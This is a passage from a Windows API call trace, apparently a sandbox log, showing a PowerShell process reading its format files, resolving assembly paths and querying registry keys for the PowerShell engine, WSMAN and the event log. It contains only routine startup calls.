[7]=0xbe))) returned 0x0 [0152.293] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xdb2f81e1, Data2=0x538b, Data3=0x4210, Data4=([0]=0xbe, [1]=0xbd, [2]=0x9b, [3]=0xd2, [4]=0x67, [5]=0xdc, [6]=0x1e, [7]=0xdc))) returned 0x0 [0152.293] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x70a5e163, Data2=0xe1ce, Data3=0x4570, Data4=([0]=0xb4, [1]=0x84, [2]=0x9f, [3]=0x8, [4]=0x58, [5]=0x1b, [6]=0x48, [7]=0x1f))) returned 0x0 [0152.293] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x3cdd00c2, Data2=0x8e25, Data3=0x4b22, Data4=([0]=0x9c, [1]=0x27, [2]=0x70, [3]=0xfb, [4]=0x9, [5]=0x65, [6]=0x91, [7]=0xc2))) returned 0x0 [0152.293] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x606c36fc, Data2=0x46ae, Data3=0x4391, Data4=([0]=0x89, [1]=0x26, [2]=0x40, [3]=0x58, [4]=0xa3, [5]=0xb8, [6]=0xd3, [7]=0x8e))) returned 0x0 [0152.294] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x6248bee8, Data2=0xd8d8, Data3=0x4b30, Data4=([0]=0xb0, [1]=0x2d, [2]=0xca, [3]=0x84, [4]=0xde, [5]=0xad, [6]=0xe9, [7]=0xb7))) returned 0x0 [0152.294] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x350 [0152.294] GetLastError () returned 0x0 [0152.294] GetFileType (hFile=0x350) returned 0x1 [0152.294] SetErrorMode (uMode=0x1) returned 0x1 [0152.294] GetFileType (hFile=0x350) returned 0x1 [0152.294] ReadFile (in: hFile=0x350, lpBuffer=0x335ee40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x335ee40*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.329] GetLastError () returned 0x0 [0152.329] ReadFile (in: hFile=0x350, lpBuffer=0x335ee40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x335ee40*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.340] GetLastError () returned 0x0 [0152.340] ReadFile (in: hFile=0x350, lpBuffer=0x335ee40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x335ee40*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.340] GetLastError () returned 0x0 [0152.340] ReadFile (in: hFile=0x350, lpBuffer=0x335ee40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x335ee40*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.340] GetLastError () returned 0x0 [0152.341] ReadFile (in: hFile=0x350, lpBuffer=0x335ee40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x335ee40*, lpNumberOfBytesRead=0x12e724*=0x8b4, lpOverlapped=0x0) returned 1 [0152.341] GetLastError () returned 0x0 [0152.341] ReadFile (in: hFile=0x350, lpBuffer=0x335e294, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x335e294*, lpNumberOfBytesRead=0x12e724*=0x0, lpOverlapped=0x0) returned 1 [0152.341] GetLastError () returned 0x0 [0152.341] ReadFile (in: hFile=0x350, lpBuffer=0x335ee40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x335ee40*, lpNumberOfBytesRead=0x12e724*=0x0, lpOverlapped=0x0) returned 1 [0152.341] GetLastError () returned 0x0 [0152.341] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e6a8 | out: phkResult=0x12e6a8*=0x350) returned 0x0 [0152.341] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12e6f0, lpData=0x0, lpcbData=0x12e6ec*=0x0 | out: lpType=0x12e6f0*=0x1, lpData=0x0, lpcbData=0x12e6ec*=0x56) returned 0x0 [0152.341] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12e6f0, lpData=0x509ca8, lpcbData=0x12e6ec*=0x56 | out: lpType=0x12e6f0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x12e6ec*=0x56) returned 0x0 [0152.341] RegCloseKey (hKey=0x350) returned 0x0 [0152.342] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x19d33dcb, Data2=0x4028, Data3=0x4e44, Data4=([0]=0x99, [1]=0xc1, [2]=0x2b, [3]=0xb6, [4]=0x68, [5]=0x7b, [6]=0xa1, [7]=0x97))) returned 0x0 [0152.342] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xf028fd0c, Data2=0xd721, Data3=0x4824, Data4=([0]=0xa9, [1]=0xd6, [2]=0x52, [3]=0xd3, [4]=0x71, [5]=0xbc, [6]=0x10, [7]=0x9e))) returned 0x0 [0152.343] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x350 [0152.343] GetLastError () returned 0x0 [0152.343] GetFileType (hFile=0x350) returned 0x1 [0152.343] SetErrorMode (uMode=0x1) returned 0x1 [0152.343] GetFileType (hFile=0x350) returned 0x1 [0152.343] ReadFile (in: hFile=0x350, lpBuffer=0x3395d4c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x3395d4c*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.375] GetLastError () returned 0x0 [0152.376] ReadFile (in: hFile=0x350, lpBuffer=0x3395d4c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x3395d4c*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.376] GetLastError () returned 0x0 [0152.376] ReadFile (in: hFile=0x350, lpBuffer=0x3395d4c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x3395d4c*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.376] GetLastError () returned 0x0 [0152.376] ReadFile (in: hFile=0x350, lpBuffer=0x3395d4c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x3395d4c*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.376] GetLastError () returned 0x0 [0152.377] ReadFile (in: hFile=0x350, lpBuffer=0x3395d4c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x3395d4c*, lpNumberOfBytesRead=0x12e724*=0xe98, lpOverlapped=0x0) returned 1 [0152.377] GetLastError () returned 0x0 [0152.377] ReadFile (in: hFile=0x350, lpBuffer=0x3395384, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x3395384*, lpNumberOfBytesRead=0x12e724*=0x0, lpOverlapped=0x0) returned 1 [0152.377] GetLastError () returned 0x0 [0152.377] ReadFile (in: hFile=0x350, lpBuffer=0x3395d4c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x3395d4c*, lpNumberOfBytesRead=0x12e724*=0x0, lpOverlapped=0x0) returned 1 [0152.377] GetLastError () returned 0x0 [0152.377] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e6a8 | out: phkResult=0x12e6a8*=0x350) returned 0x0 [0152.377] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12e6f0, lpData=0x0, lpcbData=0x12e6ec*=0x0 | out: lpType=0x12e6f0*=0x1, lpData=0x0, lpcbData=0x12e6ec*=0x56) returned 0x0 [0152.377] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12e6f0, lpData=0x509ca8, lpcbData=0x12e6ec*=0x56 | out: lpType=0x12e6f0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x12e6ec*=0x56) returned 0x0 [0152.377] RegCloseKey (hKey=0x350) returned 0x0 [0152.378] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xd43e977d, Data2=0x9c54, Data3=0x40df, Data4=([0]=0x99, [1]=0x7, [2]=0xd0, [3]=0x61, [4]=0x10, [5]=0x63, [6]=0xb2, [7]=0xb6))) returned 0x0 [0152.378] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x57f9581d, Data2=0x9e1, Data3=0x4b3a, Data4=([0]=0xb9, [1]=0xe, [2]=0x31, [3]=0x20, [4]=0x8, [5]=0x4c, [6]=0xd1, [7]=0xc2))) returned 0x0 [0152.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12e3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0152.389] GetLastError () returned 0x57 [0152.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12e3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0152.389] GetLastError () returned 0x57 [0152.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12e3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0152.403] GetLastError () returned 0x57 [0152.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12e3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0152.403] GetLastError () returned 0x57 [0152.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.459] GetLastError () returned 0x57 [0152.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.459] GetLastError () returned 0x57 [0152.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12e3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0152.470] GetLastError () returned 0x57 [0152.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12e3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0152.471] GetLastError () returned 0x57 [0152.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0152.482] GetLastError () returned 0x57 [0152.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0152.482] GetLastError () returned 0x57 [0152.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12e3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0152.484] GetLastError () returned 0x57 [0152.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12e3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0152.484] GetLastError () returned 0x57 [0152.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12e3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0152.490] GetLastError () returned 0x57 [0152.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12e3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0152.490] GetLastError () returned 0x57 [0152.493] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0152.493] GetLastError () returned 0xcb [0152.494] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0152.494] GetLastError () returned 0xcb [0152.501] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0152.502] GetLastError () returned 0xcb [0152.504] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0152.504] GetLastError () returned 0xcb [0152.505] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0152.505] GetLastError () returned 0xcb [0152.516] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e79c | out: phkResult=0x12e79c*=0x350) returned 0x0 [0152.517] RegQueryInfoKeyW (in: hKey=0x350, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12e7ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12e7f0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12e7ec*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12e7f0*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0152.519] RegEnumValueW (in: hKey=0x350, dwIndex=0x0, lpValueName=0x509ca8, lpcchValueName=0x12e814, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x12e814, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0152.519] RegEnumValueW (in: hKey=0x350, dwIndex=0x1, lpValueName=0x509ca8, lpcchValueName=0x12e814, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x12e814, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0152.519] RegQueryValueExW (in: hKey=0x350, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12e7f4, lpData=0x0, lpcbData=0x12e7f0*=0x0 | out: lpType=0x12e7f4*=0x1, lpData=0x0, lpcbData=0x12e7f0*=0x8) returned 0x0 [0152.519] RegQueryValueExW (in: hKey=0x350, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12e7f4, lpData=0x509ca8, lpcbData=0x12e7f0*=0x8 | out: lpType=0x12e7f4*=0x1, lpData="2.0", lpcbData=0x12e7f0*=0x8) returned 0x0 [0152.650] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e758 | out: phkResult=0x12e758*=0x328) returned 0x0 [0152.650] RegQueryInfoKeyW (in: hKey=0x328, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12e7a8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12e7ac, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12e7a8*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12e7ac*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0152.650] RegEnumValueW (in: hKey=0x328, dwIndex=0x0, lpValueName=0x509ca8, lpcchValueName=0x12e7d0, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x12e7d0, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0152.651] RegEnumValueW (in: hKey=0x328, dwIndex=0x1, lpValueName=0x509ca8, lpcchValueName=0x12e7d0, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x12e7d0, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0152.651] RegQueryValueExW (in: hKey=0x328, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12e7b0, lpData=0x0, lpcbData=0x12e7ac*=0x0 | out: lpType=0x12e7b0*=0x1, lpData=0x0, lpcbData=0x12e7ac*=0x8) returned 0x0 [0152.651] RegQueryValueExW (in: hKey=0x328, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12e7b0, lpData=0x509ca8, lpcbData=0x12e7ac*=0x8 | out: lpType=0x12e7b0*=0x1, lpData="2.0", lpcbData=0x12e7ac*=0x8) returned 0x0 [0152.652] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0152.652] GetLastError () returned 0xcb [0152.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0152.654] GetLastError () returned 0xcb [0153.062] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e718 | out: phkResult=0x12e718*=0x32c) returned 0x0 [0153.062] RegQueryInfoKeyW (in: hKey=0x32c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12e780, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12e77c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12e780*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12e77c*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.063] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x0, lpName=0x509ca8, lpcchName=0x12e79c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12e79c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.063] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x1, lpName=0x509ca8, lpcchName=0x12e79c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12e79c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.063] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x2, lpName=0x509ca8, lpcchName=0x12e79c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12e79c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.064] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x3, lpName=0x509ca8, lpcchName=0x12e79c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12e79c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.064] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x4, lpName=0x509ca8, lpcchName=0x12e79c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12e79c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.064] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x5, lpName=0x509ca8, lpcchName=0x12e79c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12e79c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.064] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x6, lpName=0x509ca8, lpcchName=0x12e79c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12e79c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.064] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x7, lpName=0x509ca8, lpcchName=0x12e79c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12e79c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.064] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x8, lpName=0x509ca8, lpcchName=0x12e79c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12e79c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.064] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e748 | out: phkResult=0x12e748*=0x330) returned 0x0 [0153.065] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e748 | out: phkResult=0x12e748*=0x0) returned 0x2 [0153.065] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e748 | out: phkResult=0x12e748*=0x34c) returned 0x0 [0153.065] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e748 | out: phkResult=0x12e748*=0x0) returned 0x2 [0153.065] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e748 | out: phkResult=0x12e748*=0x358) returned 0x0 [0153.065] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e748 | out: phkResult=0x12e748*=0x0) returned 0x2 [0153.065] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e748 | out: phkResult=0x12e748*=0x35c) returned 0x0 [0153.066] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e748 | out: phkResult=0x12e748*=0x0) returned 0x2 [0153.066] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e748 | out: phkResult=0x12e748*=0x360) returned 0x0 [0153.066] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e748 | out: phkResult=0x12e748*=0x0) returned 0x2 [0153.066] 